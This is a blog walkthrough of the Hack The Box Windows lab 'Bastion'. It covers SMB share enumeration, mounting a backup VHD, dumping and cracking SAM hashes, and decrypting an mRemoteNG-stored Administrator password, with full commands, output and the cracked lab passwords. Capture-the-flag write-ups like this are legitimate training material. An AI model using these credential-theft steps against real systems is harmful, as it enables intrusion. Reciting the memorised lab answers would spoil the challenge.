Bastion was an ‘easy’-rated Windows box at Hackthebox.eu, produced by L4mpje. It was a pretty simple box, but I still learned a few things.
Hints
(highlight to reveal)
User: Guest-readable shares are never a good idea.
Root: Be sure your applications are storing passwords securely.
Initial enumeration
Bastion sits at 10.10.10.134 in the hackthebox firing range. Inital nmap scans show that the box is hosting an OpenSSH server and SMB.
root@kali:~/htb/bastion# nmap -v -Pn -n 10.10.10.134 -oG bastion.gnmap Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-23 14:35 EDT Initiating SYN Stealth Scan at 14:35 Scanning 10.10.10.134 [1000 ports] Discovered open port 139/tcp on 10.10.10.134 Discovered open port 22/tcp on 10.10.10.134 Discovered open port 135/tcp on 10.10.10.134 Discovered open port 445/tcp on 10.10.10.134 Completed SYN Stealth Scan at 14:35, 1.84s elapsed (1000 total ports) Nmap scan report for 10.10.10.134 Host is up (0.031s latency). Not shown: 996 closed ports PORT STATE SERVICE 22/tcp open ssh 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds Read data files from: /usr/bin/../share/nmap Nmap done: 1 IP address (1 host up) scanned in 1.90 seconds Raw packets sent: 1003 (44.132KB) | Rcvd: 1000 (40.016KB) Host is up (0.032s latency). Not shown: 992 closed ports
Running nmap’s smb-enum-shares against the SMB server shows a few shares, including one labelled “Backups”
root@kali:~/htb/bastion# nmap -n -Pn -v 10.10.10.134 -p135,139,445 --script /usr/share/nmap/scripts/smb-enum-shares.nse PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds Host script results: | smb-enum-shares: | account_used: guest | \\10.10.10.134\ADMIN$: | Type: STYPE_DISKTREE_HIDDEN | Comment: Remote Admin | Anonymous access: | Current user access: | \\10.10.10.134\Backups: | Type: STYPE_DISKTREE | Comment: | Anonymous access: | Current user access: READ | \\10.10.10.134\C$: | Type: STYPE_DISKTREE_HIDDEN | Comment: Default share | Anonymous access: | Current user access: | \\10.10.10.134\IPC$: | Type: STYPE_IPC_HIDDEN | Comment: Remote IPC | Anonymous access: |_ Current user access: READ/WRITE
User
It’s easy enough to connect to that share as guest, and pull down the file ‘note.txt’
root@kali:~/htb/bastion# smbclient \\\\10.10.10.134\\Backups -u guest Try "help" to get a list of possible commands. smb: \> ls . D 0 Fri Aug 23 14:48:18 2019 .. D 0 Fri Aug 23 14:48:18 2019 nmap-test-file A 260 Fri Aug 23 14:48:18 2019 note.txt AR 116 Tue Apr 16 06:10:09 2019 SDT65CB.tmp A 0 Fri Feb 22 07:43:08 2019 WindowsImageBackup D 0 Fri Feb 22 07:44:02 2019 7735807 blocks of size 4096. 2791758 blocks available
Note.txt is just an admonition to not overly tax the VPN to the remote office
Sysadmins: please don’t transfer the entire backup file locally, the VPN to the subsidiary office is too slow.
But it sounds like there’s a full (or at least substantial) backup on that share.
Sure enough, in Backups\WindowsImageBackup\L4mpje-PC\Backup\ 2019-02-22\ 124351\ are a couple of vhd files:
smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\> dir
. D 0 Fri Feb 22 07:45:32 2019
.. D 0 Fri Feb 22 07:45:32 2019
9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd A 37761024 Fri Feb 22 07:44:03 2019
9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd A 5418299392 Fri Feb 22 07:45:32 2019
BackupSpecs.xml A 1186 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml A 1078 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml A 8930 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml A 6542 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml A 2894 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml A 1488 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml A 1484 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml A 3844 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml A 3988 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml A 7110 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml A 2374620 Fri Feb 22 07:45:32 2019
7735807 blocks of size 4096. 2791677 blocks available
Klockw3rk has a good tutorial for using guestfstools to mount vhd files in Linux over cifs/SMB shares, which I followed with good results.
First I created acouple of mountpoints at /media/cifs and /media/htb then mounted the remote share
root@kali:~/htb/bastion# mount -t cifs //10.10.10.134/Backups /media/cifs
Then I used guestfstools to mount the larger VHD as its own drive. The smaller VHD, upon inspection, was the boot partition.
root@kali:~/htb/bastion# guestmount --add /media/cifs/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /media/htb -v
The Windows/System32/config directory was intact and accessble, with both the SAM and system files present, so I dumped those with pwdump, and scored the hash for the L4mpje user, which I was able to crack with John:
root@kali:~/htb/bastion# mkdir ~/htb/bastion/sam root@kali:~/htb/bastion# cd ~/htb/bastion/sam pwdump /media/htb/Windows/System32/config/SYSTEM /media/htb/Windows/System32/config/SAM >> hashes.txt root@kali:~/htb/bastion/sam# john hashes.txt --format=NT --wordlist=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 2 password hashes with no different salts (NT [MD4 128/128 XOP 4x2]) Remaining 1 password hash Press 'q' or Ctrl-C to abort, almost any other key for status bureaulampje (L4mpje) 1g 0:00:00:01 DONE (2019-08-26 08:58) 0.8547g/s 8030Kp/s 8030Kc/s 8030KC/s burelison..burdy1 Warning: passwords printed above might not be all those cracked Use the "--show --format=NT" options to display all of the cracked passwords reliably Session completed
Those credentials, in turn, provided shell access via SSH, and the user flag.
Root
A lot of the common tools for enumeration weren’t available.
Wmic – permission denied.
I could download accesschk.exe, but running it threw permission denied.
Tasklist – no joy.
Etc.
Findstr, however, worked just fine, and put me on the right track.
findstr /si password *.xml *.ini *.txt *.config 2>nul
That put me on to mRemoteNG’s configuration files, which stores (reversibly) encrypted passwords. In this case, the password for the Administrator account, used for RDP sessions.
l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>type confCons.xml
Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
Hostname="127.0.0.1" Protocol="RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" Rend
eringEngine="IE" ICAEncryptionStrength="EncrBasic" RDPAuthenticationLevel="NoAuth" RDPMinutesToIdleTimeout="0" RDPAlertIdleTimeo
While mRemoteNG encrypts the passwords it stores, it has to be able to decrypt them so it can send them to remote hosts at login time. By default, the key for the AES-encrypted strings is the md5 hash of “mR3m”. There’s also a handy tool on github for decrypting these passwords.
root@kali:~/htb/bastion# python3 ../tools/mremoteng_decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw== Password: thXLHM96BeKL0ER2
While the session stored in mRemoteNG was for RDP, it worked just fine for SSH:
Thanks to Hackthebox for hosting, and L4mpje for putting a fun little box together and teaching me a few things.
-30-
Off-Kilter Security 